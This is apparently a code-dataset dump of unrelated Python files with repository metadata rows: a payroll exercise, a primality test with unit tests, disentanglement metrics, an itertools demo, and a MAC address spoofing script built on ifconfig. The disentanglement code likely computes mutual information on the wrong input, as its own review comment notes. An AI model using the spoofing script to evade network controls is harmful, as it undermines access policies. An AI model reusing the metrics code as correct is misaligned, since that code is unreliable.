    S = int(input())
    tables = Combination(S)
    total = 0
    parts = 1
    remaining = S - 3
    while remaining >= 0:
        total = (total + tables.com(remaining + parts - 1, parts - 1)) % MOD
        remaining -= 3
        parts += 1
    print(total)
if __name__ == '__main__':
    main()
71186118696 | #Task 1
# Task 1: read 30 employees' name, number and hours worked.
# Task 2: band the hours into an hourly rate and pay = hours * rate, and
# track the employee with the most hours.
# Task 3: count how many employees fall into each hours band.
best_emp_name = 0
best_emp = 0  # NOTE(review): assigned here but never used afterwards
p = 0  # hourly rate for the current employee, chosen by the bands below
hpay = 0  # highest *hours* seen so far (name suggests pay — confirm intent)
# payN counters tally how many employees fall into each hours band.
pay1 = 0
pay2 = 0
pay3 = 0
pay4 = 0
pay5 = 0
for i in range (1,31):
    emp_name = input("Enter Your Name: ")
    emp_num = int(input("Enter Number: "))
    hrs = int(input("Enter Number of hours worked: "))
    #Task 2
    # Map hours to an hourly rate and bump the matching band counter.
    if hrs < 5:
        p=0
        pay1 = pay1 + 1
    elif hrs >= 5 and hrs <= 9:
        p=70
        pay2 = pay2 + 1
    elif hrs >=10 and hrs <= 14:
        p=100
        pay3 = pay3 + 1
    elif hrs >= 15 and hrs <= 18:
        p=150
        pay4 = pay4 + 1
    elif hrs >=19:
        p=200
        pay5 = pay5 + 1
    hr_pay = hrs * p
    print("Your Pay :", hr_pay)
    # New hours record: remember the employee (20% bonus on their pay) and
    # announce them immediately.
    # NOTE(review): these prints fire every time the record is broken, inside
    # the loop — if a single final announcement is wanted, move them after
    # the loop.
    if hpay < hrs:
        hpay = hrs
        best_emp_name = emp_name
        best_emp_num = emp_num
        best_emp_pay = hr_pay * 1.2
        print("Best employee is,", best_emp_name)
        print("Best Employee number is,", best_emp_num)
        print("New Pay for Best Employee is,", best_emp_pay)
#Task 3
print("Total Number of Employees who work less thn 5 hours-", pay1)
print("Total Number of Employees who work between 5 and 9 hours-", pay2)
print("Total Number of Employees who work between 10 and 14 hours-", pay3)
print("Total Number of Employees who work between 15 and 18 hours-", pay4)
print("Total Number of Employees who work more than 19 hours-", pay5)
| aneesh27/Projects | Pre Release for summative.py | Pre Release for summative.py | py | 1,304 | python | en | code | 0 | github-code | 90 |
44020025852 | import unittest
"""
Returns true if given number is prime.
Introductory (school) method:
Test if n is prime => check for all values from 2 through sqrt(n) to see if the value divides n.
If no value divides n, then return True.
With the exclusion of 2 and 3, all primes are of the form 6k+1 or 6k-1. So, a better way to test is to
try all numbers of the form 6k+1 and 6k-1 instead of all numbers till sqrt(n).
"""
def is_prime(number):
    """Primality test by trial division over candidates of the form 6k +/- 1."""
    if number <= 1:
        return False
    if number <= 3:
        return True
    if number % 2 == 0 or number % 3 == 0:
        return False
    # Any remaining prime factor is 6k-1 or 6k+1; probe both on each step.
    candidate = 5
    while candidate * candidate <= number:
        if number % candidate == 0 or number % (candidate + 2) == 0:
            return False
        candidate += 6
    return True
class TestPrimality(unittest.TestCase):
    """Unit tests for is_prime, including edge cases the original omitted."""

    def test_is_prime(self):
        self.assertTrue(is_prime(11))
        self.assertFalse(is_prime(15))
        # Smallest primes and non-positive inputs.
        self.assertTrue(is_prime(2))
        self.assertTrue(is_prime(3))
        self.assertFalse(is_prime(0))
        self.assertFalse(is_prime(1))
        self.assertFalse(is_prime(-5))
        # Squares of primes exercise the candidate*candidate <= n boundary.
        self.assertFalse(is_prime(25))
        self.assertFalse(is_prime(49))
        self.assertTrue(is_prime(7919))
| prathamtandon/g4gproblems | Math/is_prime.py | is_prime.py | py | 878 | python | en | code | 3 | github-code | 90 |
24178564407 | import numpy as np
import logging
from evaluation.unsupervised_metrics.correlation import gaussian_total_correlation, gaussian_wasserstein_correlation
from evaluation.unsupervised_metrics.mutual_info import discrete_mutual_info, discrete_entropy
from evaluation.shared import generate_batch_factor_code
def unsupervised_metrics(
    ground_truth_data,
    representation_fn,
    random_state,
    num_train,
    batch_size=32):
  """Computes unsupervised scores based on covariance and mutual information.

  Args:
    ground_truth_data: GroundTruthData to be sampled from.
    representation_fn: Function that takes observations as input and
      outputs a dim_representation sized representation for each observation.
    random_state: Numpy random state used for randomness.
    num_train: Number of points used for training.
    batch_size: Batch size for sampling.

  Returns:
    Dictionary with scores.
  """
  scores = {}
  # mus_train: one row per latent code, one column per sampled point
  # (shape inferred from the np.cov / shape[0] usage below — confirm
  # against generate_batch_factor_code).
  mus_train, _ = generate_batch_factor_code(
      ground_truth_data,
      representation_fn,
      num_train,
      random_state,
      batch_size
  )
  num_codes = mus_train.shape[0]
  cov_mus = np.cov(mus_train)
  assert num_codes == cov_mus.shape[0]

  # Gaussian total correlation.
  scores["gaussian_total_correlation"] = gaussian_total_correlation(cov_mus)

  # Gaussian Wasserstein correlation, plus a variance-normalized variant.
  scores["gaussian_wasserstein_correlation"] = gaussian_wasserstein_correlation(cov_mus)
  scores["gaussian_wasserstein_correlation_norm"] = (scores["gaussian_wasserstein_correlation"] / np.sum(np.diag(cov_mus)))

  # Compute average mutual information between different factors.
  # NOTE(review): this feeds the per-code *entropy values* (one scalar per
  # code, reshaped to a column) into discrete_mutual_info rather than
  # discretized codes — verify this is intended.
  mus_discrete = discrete_entropy(mus_train).reshape(-1,1)
  mutual_info_matrix = discrete_mutual_info(mus_discrete, mus_discrete)
  # Zero the diagonal so self-information does not inflate the average.
  np.fill_diagonal(mutual_info_matrix, 0)
  mutual_info_score = np.sum(mutual_info_matrix) / (num_codes**2 - num_codes)
  scores["mutual_info_score"] = mutual_info_score

  return scores
| kkahloots/Generative_Models | evaluation/unsupervised_metrics/disentangle_api.py | disentangle_api.py | py | 2,180 | python | en | code | 1 | github-code | 90 |
21650432472 | #!/usr/bin/env python
import subprocess
import optparse
import re
def get_arguments():
    """Parse and validate the -i/--interface and -m/--mac command-line options."""
    parser = optparse.OptionParser()
    parser.add_option("-i", "--interface", dest="interface", help="Network Interface to Change MAC Address")
    parser.add_option("-m", "--mac", dest="new_mac", help="New MAC Address")
    options, _positional = parser.parse_args()
    # Both options are mandatory; parser.error() prints the message and exits,
    # so the second check is only reached when the first one passed.
    if not options.interface:
        parser.error("[+] Please Specify an Interface, use --help for More Info")
    if not options.new_mac:
        parser.error("[+] Please Specify a New MAC, use --help for More Info")
    return options
def change_mac(interface, new_mac):
    """Bring the interface down, set its hardware address, and bring it back up."""
    print("\n[+] Changing MAC Address for " + interface + " to " + new_mac + "\n")
    # Each step is a separate ifconfig invocation, run as an argument list
    # (no shell) in sequence.
    for command in (["ifconfig", interface, "down"],
                    ["ifconfig", interface, "hw", "ether", new_mac],
                    ["ifconfig", interface, "up"]):
        subprocess.call(command)
    print("[+] Interface MAC Address Successfully Changed!\n")
def get_current_mac(interface):
    """Return the interface's MAC address parsed from ifconfig output,
    or None (implicitly) when no address pattern is found."""
    output = subprocess.check_output(["ifconfig", interface])
    match = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", str(output))
    if match:
        return match.group(0)
    print("[-] Could not read MAC address.")
# interface = options.interface
# new_mac = options.new_mac
# Function Calls
# Script flow: parse the arguments, show the current MAC, apply the change,
# then re-read the MAC to verify the change actually took effect.
options = get_arguments()
current_mac = get_current_mac(options.interface)
print("Current MAC Address = " + str(current_mac))
change_mac(options.interface, options.new_mac)
current_mac = get_current_mac(options.interface)
if current_mac == options.new_mac:
    print("[+] MAC address was successfully changed to " + current_mac)
else:
    print("[-] Mac address change was not successful")
# Historical interactive/shell-based variant kept for reference:
# For Python 2, use raw_input()
# interface = input("Please Enter Network Interface >")
# new_mac = input("Please Enter New MAC Address >")
# print("[+] Changing MAC Address for " + interface + " to " + new_mac)
# subprocess.call("ifconfig " + interface + " down", shell=True)
# subprocess.call("ifconfig " + interface + " hw ether " + new_mac, shell=True)
# subprocess.call("ifconfig " + interface + " up", shell=True)
# print("[+] Interface MAC Address Successfully Changed!")
# subprocess.call("ifconfig " + interface, shell=True)
| pentestcave/Automation-Tooling | mac-changer/mac-changer.py | mac-changer.py | py | 2,552 | python | en | code | 0 | github-code | 90 |
71794428777 | import itertools
# 1. Combinatoric generators
# product(): Cartesian product of the given iterables.
for item in itertools.product([1, 2, 3, 4], [5, 6, 7, 8]):
    print(item)
# permutations(): every ordering of the elements (order matters).
print(list(itertools.permutations([1, 2, 3, 4])))
# permutations() with an explicit length: ordered arrangements of 2 elements.
print(list(itertools.permutations([1, 2, 3, 4], 2)))
# combinations(): length-2 selections where element order does not matter.
print(list(itertools.combinations([1, 2, 3, 4], 2)))
# 2. Infinite iterators
# count(start, step): evenly spaced values starting at `start`; must be
# broken out of manually because it never ends on its own.
for item in itertools.count(10, 3):
    if item > 100:
        break
    print(item)
# cycle(): repeats the iterable's elements endlessly (left commented out
# below because the loop would never terminate).
its = ["a", "b", "c", "d"]
# for item in itertools.cycle(its):
#     print(item)
# repeat(obj, n): yields the same object n times.
for item in itertools.repeat(its, 4):
    print(item)
# 3. Iterators terminating on the shortest input
# chain(): concatenates several iterables into one stream.
its = ["a", "b", "c", "d"]
hers = ["A", "B", "C", "D"]
others = ["1", "2", "3", "4"]
for item in itertools.chain(its, hers, others):
    print(item)
# compress(): keeps the elements whose selector entry is truthy.
its = ["a", "b", "c", "d", "e", "f", "g", "h"]
selector = [True, False, 1, 0, 3, False, -2, "y"]
for item in itertools.compress(its, selector):
    print(item)
print(list(range(5)))
| LIMr1209/test | itertools_test.py | itertools_test.py | py | 1,491 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.